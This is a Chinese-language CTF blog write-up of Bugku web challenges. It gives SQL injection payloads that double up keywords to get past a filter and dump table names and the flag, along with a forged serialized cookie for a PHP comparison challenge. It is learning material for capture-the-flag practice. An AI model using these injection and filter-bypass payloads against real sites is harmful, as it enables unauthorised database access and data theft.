bugku练习(web)
因为之前有的做完了暂时懒得回忆以后重新做一遍再写,现在就先从中间开始往后写吧(先立个flag~)
1、多次(因为我懒就先不配图了以后再说吧…)
先看地址栏,输入id=5时出现提示sql injection
下面就是知识盲区… 转别人的wp
加’后返回错误,尝试加#返回正确,且发现有过滤
用1’(length(‘select’)=6)’之类的方法可以发现被过滤的关键字(有过滤返回正确,无则错误,异或注入,select,union,or,and,information…被过滤)之后尝试复写可以绕过
然后。。。。
?id=1’ oorrder by 3#
?id=-1’ ununionion seleselectct 1,database() #
?id=-1’ ununionion seselectlect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database() #
?id=-1’ ununionion seleselectct 1,group_concat(address) from flag1#
之后要进行报错注入(?知识盲点)
https://blog.csdn.net/u011377996/article/details/79340100(参考)
2、flag.php
(一开始真的没想到)GET传入hint得到提示
有用的大概有$cookie = cookie) === “KEY” 用bp抓包添加cookie
*此处因为key没有定义所以相当于NULL,构造出来是s:0:""(下面的干扰KEY我做的时候根本没看着后来才知道)Cookie: ISecer=s:0:""后得到flag
3、PHP_encrypt_1(ISCCCTF)真香
4、孙xx的博客
没看懂??据说是坏了??求讲解
5、Trim的日记本
一开始没思路后来听说直接御剑扫描出结果了???迷
6、江湖魔头
打开后找到wulin.php发现提示(?)
*竟然要看每个js文件,做的时候完全想不到,并且后面的解法让我更加蒙圈了。。。。
来源:CSDN
作者:Sunrise in Tequila
链接:https://blog.csdn.net/weixin_45805993/article/details/104302209